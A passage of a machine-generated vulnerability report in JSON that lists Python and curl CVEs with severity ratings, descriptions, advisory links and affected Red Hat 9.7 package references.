"urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2026-3644", "ratings": [ { "source": { "name": "alma" }, "severity": "high" }, { "source": { "name": "amazon" }, "severity": "high" }, { "source": { "name": "oracle-oval" }, "severity": "high" }, { "source": { "name": "redhat" }, "score": 5.4, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "source": { "name": "rocky" }, "severity": "high" } ], "cwes": [ 20, 116 ], "description": "The fix for CVE-2026-0672, which rejected control characters in http.cookies.Morsel, was incomplete. The Morsel.update(), |= operator, and unpickling paths were not patched, allowing control characters to bypass input validation. Additionally, BaseCookie.js_output() lacked the output validation applied to BaseCookie.output().", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-3644" }, { "url": "https://access.redhat.com/errata/RHSA-2026:10950" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-3644" }, { "url": "https://bugzilla.redhat.com/2395108" }, { "url": "https://bugzilla.redhat.com/2408891" }, { "url": "https://bugzilla.redhat.com/2418084" }, { "url": "https://bugzilla.redhat.com/2431366" }, { "url": "https://bugzilla.redhat.com/2431374" }, { "url": "https://bugzilla.redhat.com/2444691" }, { "url": "https://bugzilla.redhat.com/2448168" }, { "url": "https://bugzilla.redhat.com/2448181" }, { "url": "https://bugzilla.redhat.com/2457409" }, { "url": "https://bugzilla.redhat.com/2457932" }, { "url": "https://bugzilla.redhat.com/2458049" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2395108" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2408891" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2418084" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431366" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431374" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444691" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448168" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448181" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457409" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457932" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458049" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-13837" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15282" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-59375" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-6075" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0672" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1502" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-2297" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3644" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4224" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4786" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-6100" }, { "url": "https://errata.almalinux.org/8/ALSA-2026-10950.html" }, { "url": "https://errata.rockylinux.org/RLSA-2026:10950" }, { "url": "https://github.com/python/cpython/commit/57e88c1cf95e1481b94ae57abe1010469d47a6b4" }, { "url": "https://github.com/python/cpython/commit/62ceb396fcbe69da1ded3702de586f4072b590dd" }, { "url": "https://github.com/python/cpython/commit/d16ecc6c3626f0e2cc8f08c309c83934e8a979dd" }, { "url": "https://github.com/python/cpython/issues/145599" }, { "url": "https://github.com/python/cpython/pull/145600" }, { "url": "https://linux.oracle.com/cve/CVE-2026-3644.html" }, { "url": "https://linux.oracle.com/errata/ELSA-2026-10950.html" }, { "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/H6CADMBCDRFGWCMOXWUIHFJNV43GABJ7/" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3644" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-3644" } ], "published": "2026-03-16T18:16:09+00:00", "updated": "2026-03-17T14:20:01+00:00", "affects": [ { "ref": "pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7", "versions": [ { "version": "3.9.25-3.el9_7.2", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "3.9.25-3.el9_7.2", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "3.9.25-3.el9_7.2", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2026-3783", "ratings": [ { "source": { "name": "azure" }, "severity": "medium" }, { "source": { "name": "julia" }, "score": 5.3, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "source": { "name": "photon" }, "severity": "medium" }, { "source": { "name": "redhat" }, "score": 5.7, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N" }, { "source": { "name": "ubuntu" }, "severity": "medium" } ], "cwes": [ 522 ], "description": "When an OAuth2 bearer token is used for an HTTP(S) transfer, and that transfer\nperforms a redirect to a second URL, curl could leak that token to the second\nhostname under some circumstances.\n\nIf the hostname that the first request is redirected to has information in the\nused .netrc file, with either of the `machine` or `default` keywords, curl\nwould pass on the bearer token set for the first host also to the second one.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-3783" }, { "url": "http://www.openwall.com/lists/oss-security/2026/03/11/2" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-3783" }, { "url": "https://curl.se/docs/CVE-2026-3783.html" }, { "url": "https://curl.se/docs/CVE-2026-3783.json" }, { "url": "https://github.com/advisories/GHSA-8whr-249c-vfjp" }, { "url": "https://hackerone.com/reports/3583983" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3783" }, { "url": "https://ubuntu.com/security/notices/USN-8084-1" }, { "url": "https://ubuntu.com/security/notices/USN-8099-1" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-3783" } ], "published": "2026-03-11T11:16:00+00:00", "updated": "2026-03-12T14:10:37+00:00", "affects": [ { "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "7.76.1-35.el9_7.3", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "7.76.1-35.el9_7.3", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2026-3784", "ratings": [ { "source": { "name": "azure" }, "severity": "medium" }, { "source": { "name": "julia" }, "score": 6.5, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" }, { "source": { "name": "photon" }, "severity": "medium" }, { "source": { "name": "redhat" }, "score": 6.5, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "source": { "name": "ubuntu" }, "severity": "low" } ], "cwes": [ 305 ], "description": "curl would wrongly reuse an existing HTTP proxy connection doing CONNECT to a\nserver, even if the new request uses different credentials for the HTTP proxy.\nThe proper behavior is to create or use a separate connection.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-3784" }, { "url": "http://www.openwall.com/lists/oss-security/2026/03/11/3" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-3784" }, { "url": "https://curl.se/docs/CVE-2026-3784.html" }, { "url": "https://curl.se/docs/CVE-2026-3784.json" }, { "url": "https://github.com/advisories/GHSA-5q3w-6p3j-mw6p" }, { "url": "https://hackerone.com/reports/3584903" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3784" }, { "url": "https://ubuntu.com/security/notices/USN-8084-1" }, { "url": "https://ubuntu.com/security/notices/USN-8099-1" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-3784" } ], "published": "2026-03-11T11:16:00+00:00", "updated": "2026-03-12T14:09:50+00:00", "affects": [ { "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "7.76.1-35.el9_7.3", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "7.76.1-35.el9_7.3", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": 